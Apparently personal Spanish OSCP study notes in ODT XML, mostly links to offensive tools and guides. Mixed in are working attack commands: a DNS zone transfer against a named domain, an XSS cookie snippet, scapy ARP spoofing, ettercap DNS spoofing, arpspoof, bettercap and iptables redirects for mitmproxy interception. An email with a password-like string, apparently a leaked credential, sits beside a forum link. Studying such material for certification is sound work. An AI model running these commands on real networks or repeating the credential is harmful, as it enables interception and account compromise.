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enlaces:certificaciones:oscp"/><text:bookmark-start text:name="__RefHeading___profesional_certificado_en_seguridad_ofensiva_oscp_1"/><text:bookmark-start text:name="profesional_certificado_en_seguridad_ofensiva_oscp"/>Profesional certificado en seguridad ofensiva (OSCP)<text:bookmark-end text:name="__RefHeading___profesional_certificado_en_seguridad_ofensiva_oscp_1"/><text:bookmark-end text:name="profesional_certificado_en_seguridad_ofensiva_oscp"/></text:h>
      <text:p text:style-name="Text_20_body">Profesional certificado en seguridad ofensiva (<text:span text:style-name="Strong_20_Emphasis">OSCP</text:span>) es una certificación de ethical hacking ofrecida por Offensive Security que enseña metodologías de exámenes de penetración y utilizan herramientas incluyendo el examen de pentración BackTrack (ahora realizado con éxito con la distribución Kali Linux)1​2​ La certificación OSCP consiste en un examen práctico que requiere atacar y penetrar de manera satisfactoria varias maquinas en un ambiente seguro controlado.3​ Actualmente, es una de las pocas certificaciones que requiere evidencia de las habilidades en la parte práctica que consiste en una prueba de penetración.</text:p>
      <text:h text:style-name="Heading_20_2" text:outline-level="2"><text:bookmark-start text:name="__RefHeading___referencias_que_veo_para_prepararme_2"/><text:bookmark-start text:name="referencias_que_veo_para_prepararme"/>Referencias que veo para prepararme<text:bookmark-end text:name="__RefHeading___referencias_que_veo_para_prepararme_2"/><text:bookmark-end text:name="referencias_que_veo_para_prepararme"/></text:h>
      <text:list text:style-name="List_20_1" text:continue-numbering="false">
        <text:list-item>
          <text:p text:style-name="LastListParagraph_List_20_1_Content_First"> shi_ver_bot : A Telegram bot to see if your password was in the BreachCompilation</text:p>
        </text:list-item>
      </text:list>
      <text:p text:style-name="Text_20_body">beef project</text:p>
      <text:p text:style-name="Text_20_body">sitio de boca
buscar
alert(document.cookie)&lt;/script&gt;</text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://www.netcraft.com/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.netcraft.com/</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://www.seleniumhq.org/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.seleniumhq.org/</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://panopticlick.eff.org/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://panopticlick.eff.org/</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://beefproject.com/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://beefproject.com/</text:a></text:p>
      <text:p text:style-name="Text_20_body">dig @200.111.157.67 unap.cl -t AXFR</text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://www.acunetix.com/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.acunetix.com/</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://github.com/1N3/Sn1per" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/1N3/Sn1per</text:a></text:p>
      <text:p text:style-name="Text_20_body">portnocking</text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://blog.wpscans.com/sniff-wordpress-login-credentials-wireshark-http-connection/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://blog.wpscans.com/sniff-wordpress-login-credentials-wireshark-http-connection/</text:a></text:p>
      <text:p text:style-name="Text_20_body"><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kali.training/lessons/introduction/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://kali.training/lessons/introduction/</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://kali.training/topic/introduction-to-kali-linux/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://kali.training/topic/introduction-to-kali-linux/</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://www.offensive-security.com/information-security-certifications/oswe-offensive-security-web-expert/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.offensive-security.com/information-security-certifications/oswe-offensive-security-web-expert/</text:a>
<text:a xlink:type="simple" xlink:href="https://www.offensive-security.com/information-security-certifications/oscp-offensive-security-certified-professional/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.offensive-security.com/information-security-certifications/oscp-offensive-security-certified-professional/</text:a>
<text:a xlink:type="simple" xlink:href="https://www.offensive-security.com/information-security-training/penetration-testing-training-kali-linux/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.offensive-security.com/information-security-training/penetration-testing-training-kali-linux/</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://smarterworkspaces.kyocera.es/blog/certificacion-seguridad-informatica-cuales-las-principales/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://smarterworkspaces.kyocera.es/blog/certificacion-seguridad-informatica-cuales-las-principales/</text:a></text:p>
      <text:p text:style-name="Text_20_body">(ip.addr == 10.168.40.145) and (!udp contains “HTTP/1.1”)</text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://tools.kali.org/information-gathering/nmap" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://tools.kali.org/information-gathering/nmap</text:a></text:p>
      <text:p text:style-name="Text_20_body">ip.src == 192.168.0.99 &amp;&amp; tcp.flags.syn==1 &amp;&amp; tcp.flags.ack==1</text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://3.14.by/en/md5" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://3.14.by/en/md5</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://github.com/alearea51/IKn0wU" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/alearea51/IKn0wU</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://github.com/TunisianEagles/SocialBox" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/TunisianEagles/SocialBox</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://github.com/gentilkiwi/mimikatz" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/gentilkiwi/mimikatz</text:a>
<text:a xlink:type="simple" xlink:href="https://github.com/AlessandroZ/LaZagne" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/AlessandroZ/LaZagne</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://github.com/reconSF/python/blob/master/Syngress.Violent.Python.a.Cookbook.for.Hackers.2013.pdf" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/reconSF/python/blob/master/Syngress.Violent.Python.a.Cookbook.for.Hackers.2013.pdf</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://github.com/vk496/linset" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/vk496/linset</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://foro.seguridadwireless.net/manuales-de-wifislax-wifiway/manual-basico-de-wifislax-y-sus-herramientas-de-auditoria/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://foro.seguridadwireless.net/manuales-de-wifislax-wifiway/manual-basico-de-wifislax-y-sus-herramientas-de-auditoria/</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://github.com/WifiPhisher" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/WifiPhisher</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://github.com/xtr4nge/FruityWifi" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/xtr4nge/FruityWifi</text:a></text:p>
      <text:p text:style-name="Text_20_body">scapy</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a = ARP(op=“who-has”, psrc=“192.168.168.2”, pdst=“192.168.168.131”, hwdst=“fe80::4067:2e3f:d06:61bd”)</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a = ARP(op=“who-has”, psrc=“10.168.40.1”, pdst=“10.168.40.70”, hwdst=“fe80::4067:2e3f:d06:61bd”)</text:p>
      <text:p text:style-name="Text_20_body">10.168.40.1</text:p>
      <text:p text:style-name="Text_20_body">ip a falsear		ip victima 	mac victima
a = ARP(op=“who-has”, psrc=“10.168.40.1”, pdst=“10.168.40.70”, hwdst=“08:00:27:52:2D:A0”)</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send(a, inter=3, loop=1)</text:p>
                      </table:table-cell>
                    </table:table-row>
                  </table:table>
                </table:table-cell>
              </table:table-row>
            </table:table>
          </table:table-cell>
        </table:table-row>
      </table:table>
      <text:p text:style-name="Text_20_body">ettercap</text:p>
      <text:p text:style-name="Preformatted_20_Text">ettercap -T -q -i eth0 -P dns_spoof -M arp /10.168.40.145/// </text:p>
      <text:p text:style-name="Text_20_body">tcpdump -n -i wlan0 -e 'arp or icmp'</text:p>
      <text:p text:style-name="Text_20_body">arping -c 1 -I wlan0 10.168.40.1
ARPING 10.168.40.1
60 bytes from 08:00:27:7e:b5:f7 (10.168.40.1): index=0 time=1.363 msec
60 bytes from 00:17:c5:15:81:6a (10.168.40.1): index=1 time=2.670 msec</text:p>
      <text:p text:style-name="Text_20_body">— 10.168.40.1 statistics —</text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://sandilands.info/sgordon/arp-spoofing-on-wired-lan" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://sandilands.info/sgordon/arp-spoofing-on-wired-lan</text:a></text:p>
      <text:p text:style-name="Text_20_body">mitmproxy</text:p>
      <text:p text:style-name="Text_20_body">arpspoof -i eth0 -t 10.168.40.70 10.168.40.1</text:p>
      <text:p text:style-name="Text_20_body">iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 8080
 iptables -t nat -A PREROUTING -p tcp –destination-port 443 -j REDIRECT –to-port 8080</text:p>
      <text:p text:style-name="Text_20_body">mitmproxy –mode transparent</text:p>
      <text:p text:style-name="Horizontal_20_Line"/>
      <text:p text:style-name="Text_20_body">bettercap -T ipvictima –proxy -P</text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://github.com/byt3bl33d3r/MITMf" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/byt3bl33d3r/MITMf</text:a>
<text:a xlink:type="simple" xlink:href="https://backtrackacademy.com/articulo/saltando-hsts-con-man-in-the-middle-framework" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://backtrackacademy.com/articulo/saltando-hsts-con-man-in-the-middle-framework</text:a>
<text:a xlink:type="simple" xlink:href="http://www.elladodelmal.com/2016/03/ataques-man-in-middle-hsts-sslstrip-2.html" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://www.elladodelmal.com/2016/03/ataques-man-in-middle-hsts-sslstrip-2.html</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://www.trustwave.com/Resources/SpiderLabs-Blog/Changes-in-Oracle-Database-12c-password-hashes/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.trustwave.com/Resources/SpiderLabs-Blog/Changes-in-Oracle-Database-12c-password-hashes/</text:a></text:p>
      <text:p text:style-name="Text_20_body">w2af 
<text:a xlink:type="simple" xlink:href="http://exploitpack.com/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://exploitpack.com/</text:a></text:p>
      <text:p text:style-name="Horizontal_20_Line"/>
      <text:p text:style-name="Text_20_body">WIFI </text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://github.com/xtr4nge/FruityC2" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/xtr4nge/FruityC2</text:a></text:p>
      <text:p text:style-name="Horizontal_20_Line"/>
      <text:p text:style-name="Text_20_body">android
<text:a xlink:type="simple" xlink:href="https://github.com/M4sc3r4n0/Evil-Droid" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/M4sc3r4n0/Evil-Droid</text:a></text:p>
      <text:p text:style-name="Text_20_body">extra </text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://github.com/nixawk/pentest-wiki" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/nixawk/pentest-wiki</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://geekflare.com/online-scan-website-security-vulnerabilities/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://geekflare.com/online-scan-website-security-vulnerabilities/</text:a></text:p>
      <text:p text:style-name="Text_20_body">otra</text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://es.scribd.com/document/13213787/CUH-E-zine-4%C2%AA-Edicion" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://es.scribd.com/document/13213787/CUH-E-zine-4%C2%AA-Edicion</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://www.aircrack-ng.org/doku.php?id=es:aireplay-ng" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.aircrack-ng.org/doku.php?id=es:aireplay-ng</text:a>
<text:a xlink:type="simple" xlink:href="https://www.aircrack-ng.org/doku.php?id=es:deauthentication" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.aircrack-ng.org/doku.php?id=es:deauthentication</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://www.offensive-security.com/metasploit-unleashed/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.offensive-security.com/metasploit-unleashed/</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://blog.segu-info.com.ar/2018/09/examen-de-prueba-para-estudiantes-del.html" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://blog.segu-info.com.ar/2018/09/examen-de-prueba-para-estudiantes-del.html</text:a>
<text:a xlink:type="simple" xlink:href="https://www.alienvault.com/blogs/security-essentials/how-to-prepare-to-take-the-oscp" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.alienvault.com/blogs/security-essentials/how-to-prepare-to-take-the-oscp</text:a></text:p>
      <text:p text:style-name="Text_20_body">OSCP</text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://www.sniferl4bs.com/2015/11/entrenando-en-casa-para-rendir-el-oscp.html" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.sniferl4bs.com/2015/11/entrenando-en-casa-para-rendir-el-oscp.html</text:a>
<text:a xlink:type="simple" xlink:href="https://medium.com/@hakluke/haklukes-ultimate-oscp-guide-part-1-is-oscp-for-you-b57cbcce7440" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://medium.com/@hakluke/haklukes-ultimate-oscp-guide-part-1-is-oscp-for-you-b57cbcce7440</text:a>
<text:a xlink:type="simple" xlink:href="https://medium.com/@hakluke/haklukes-ultimate-oscp-guide-part-2-workflow-and-documentation-tips-9dd335204a48" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://medium.com/@hakluke/haklukes-ultimate-oscp-guide-part-2-workflow-and-documentation-tips-9dd335204a48</text:a>
<text:a xlink:type="simple" xlink:href="https://medium.com/@hakluke/haklukes-ultimate-oscp-guide-part-3-practical-hacking-tips-and-tricks-c38486f5fc97" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://medium.com/@hakluke/haklukes-ultimate-oscp-guide-part-3-practical-hacking-tips-and-tricks-c38486f5fc97</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://support.offensive-security.com/#!pwk-support.md" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://support.offensive-security.com/#!pwk-support.md</text:a>
<text:a xlink:type="simple" xlink:href="https://support.offensive-security.com/#!oscp-exam-guide.md" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://support.offensive-security.com/#!oscp-exam-guide.md</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://www.offensive-security.com/documentation/penetration-testing-with-kali.pdf" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.offensive-security.com/documentation/penetration-testing-with-kali.pdf</text:a>
<text:a xlink:type="simple" xlink:href="https://www.securitysift.com/offsec-pwb-oscp/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.securitysift.com/offsec-pwb-oscp/</text:a>
<text:a xlink:type="simple" xlink:href="https://www.adampalmer.me/iodigitalsec/2013/04/11/offensive-security-pwb-course-and-oscp-certification-review/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.adampalmer.me/iodigitalsec/2013/04/11/offensive-security-pwb-course-and-oscp-certification-review/</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://vcatalan.com/2017/01/OSCP-part-I-preparacion-estudio-previo.html" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://vcatalan.com/2017/01/OSCP-part-I-preparacion-estudio-previo.html</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://mytcpip.com/2017/08/10/taller-de-hacking-i-nmap-a-fondo-metasploit-basico/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://mytcpip.com/2017/08/10/taller-de-hacking-i-nmap-a-fondo-metasploit-basico/</text:a>
<text:a xlink:type="simple" xlink:href="https://null-byte.wonderhowto.com/forum/upload-shell-from-phpmyadmin-xampp-by-mohamed-ahmed-0179931/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://null-byte.wonderhowto.com/forum/upload-shell-from-phpmyadmin-xampp-by-mohamed-ahmed-0179931/</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://www.exam-labs.com/exam/NSE4#tutorial" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.exam-labs.com/exam/NSE4#tutorial</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://www.ihacklabs.com/es/el-mejor-sistema-de-pivoting-en-linux/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.ihacklabs.com/es/el-mejor-sistema-de-pivoting-en-linux/</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://wiki.wireshark.org/SampleCaptures" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://wiki.wireshark.org/SampleCaptures</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://www.ubuntupit.com/an-ultimate-list-of-ethical-hacking-and-penetration-testing-tools-for-kali-linux/?fbclid=IwAR2szRvngTnDw8X7sETTlDH7letMnJriTBNSWYe_P4t49VVScqdxS2gWhV8" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.ubuntupit.com/an-ultimate-list-of-ethical-hacking-and-penetration-testing-tools-for-kali-linux/?fbclid=IwAR2szRvngTnDw8X7sETTlDH7letMnJriTBNSWYe_P4t49VVScqdxS2gWhV8</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://openwall.info/wiki/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://openwall.info/wiki/</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://github.com/ibr2/pwk-cheatsheet" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/ibr2/pwk-cheatsheet</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://www.keiththome.com/oscp-course-review/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.keiththome.com/oscp-course-review/</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="http://fl3x.us/blog/2015/09/22/order-wireless-devices-for-wifu-course/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://fl3x.us/blog/2015/09/22/order-wireless-devices-for-wifu-course/</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://amonsec.net/course/offensive-security-pwk-course-review" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://amonsec.net/course/offensive-security-pwk-course-review</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://blog.g0tmi1k.com/2013/08/cracking-perimeter-ctp-offensive/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://blog.g0tmi1k.com/2013/08/cracking-perimeter-ctp-offensive/</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://www.ihacklabs.com/es/certificacion-osce-review-cracking-the-perimeter-ctp/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.ihacklabs.com/es/certificacion-osce-review-cracking-the-perimeter-ctp/</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="http://www.vividmachines.com/shellcode/shellcode.html" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://www.vividmachines.com/shellcode/shellcode.html</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://www.securitysift.com/offsec-ctp-osce/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.securitysift.com/offsec-ctp-osce/</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://hackforums.net/member.php" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://hackforums.net/member.php</text:a>
cayuqueo@gmail.com
EBM1JUD1yq57pmgUAiqHQ</text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="http://nixware.net/my-osce-journey" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://nixware.net/my-osce-journey</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="http://www.cs.virginia.edu/~evans/cs216/guides/x86.html" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://www.cs.virginia.edu/~evans/cs216/guides/x86.html</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://www.pentesteracademy.com/topics" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.pentesteracademy.com/topics</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://openwall.info/wiki/p_lkrg/Main" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://openwall.info/wiki/p_lkrg/Main</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://github.com/tanc7/hacking-books" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/tanc7/hacking-books</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://github.com/tanc7" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/tanc7</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://infosecuritygeek.com/vulnhub-kioptrix-2014/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://infosecuritygeek.com/vulnhub-kioptrix-2014/</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="http://www.securitysift.com/offsec-pwb-oscp/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://www.securitysift.com/offsec-pwb-oscp/</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://xapax.gitbooks.io/security/content/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://xapax.gitbooks.io/security/content/</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://medium.com/@bondo.mike/ptp-lab-privilege-escalation-with-services-5d14a99a28d1" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://medium.com/@bondo.mike/ptp-lab-privilege-escalation-with-services-5d14a99a28d1</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://github.com/xapax/oscp" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/xapax/oscp</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://medium.com/@m4lv0id/and-i-did-oscp-589babbfea19" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://medium.com/@m4lv0id/and-i-did-oscp-589babbfea19</text:a></text:p>
      <text:p text:style-name="Text_20_body">Cupp para crear diccionarios
git clone <text:a xlink:type="simple" xlink:href="https://github.com/Mebus/cupp.git" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/Mebus/cupp.git</text:a></text:p>
      <text:p text:style-name="Text_20_body">Generar ataques de Bruteforce a redes sociales
git clone <text:a xlink:type="simple" xlink:href="https://github.com/TunisianEagles/SocialBox.git" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/TunisianEagles/SocialBox.git</text:a></text:p>
      <text:p text:style-name="Text_20_body">Dump de passwords (Volcado de memoria)
<text:a xlink:type="simple" xlink:href="https://github.com/AlessandroZ/LaZagne" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/AlessandroZ/LaZagne</text:a></text:p>
      <text:p text:style-name="Text_20_body">Cracking WPA/WPA2 con phishing
<text:a xlink:type="simple" xlink:href="https://github.com/vk496/linset" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/vk496/linset</text:a>
<text:a xlink:type="simple" xlink:href="https://github.com/wifiphisher/wifiphisher" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/wifiphisher/wifiphisher</text:a></text:p>
      <text:p text:style-name="Text_20_body">instabridge</text:p>
      <text:p text:style-name="Text_20_body">–mode transparent</text:p>
      <text:p text:style-name="Text_20_body">mitm.it/cert/p12</text:p>
      <text:p text:style-name="Text_20_body">bettercap -T [ip_victima] –proxy -P</text:p>
      <text:p text:style-name="Text_20_body">Evil-Droid
git clone <text:a xlink:type="simple" xlink:href="https://github.com/M4sc3r4n0/Evil-Droid.git" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/M4sc3r4n0/Evil-Droid.git</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s://github.com/mikaelkall/HackingAllTheThings" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/mikaelkall/HackingAllTheThings</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://www.vortex.id.au/2017/05/oscp-exam-preparation-exam-day-report-day/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.vortex.id.au/2017/05/oscp-exam-preparation-exam-day-report-day/</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://github.com/P3t3rp4rk3r/OSCP-cheat-sheet-1" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/P3t3rp4rk3r/OSCP-cheat-sheet-1</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://github.com/so87/OSCP-PwK" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/so87/OSCP-PwK</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://medium.com/@chennylmf/hackthebox-lame-c28b19558cb0" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://medium.com/@chennylmf/hackthebox-lame-c28b19558cb0</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://github.com/OlivierLaflamme/Cheatsheet-God" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/OlivierLaflamme/Cheatsheet-God</text:a></text:p>
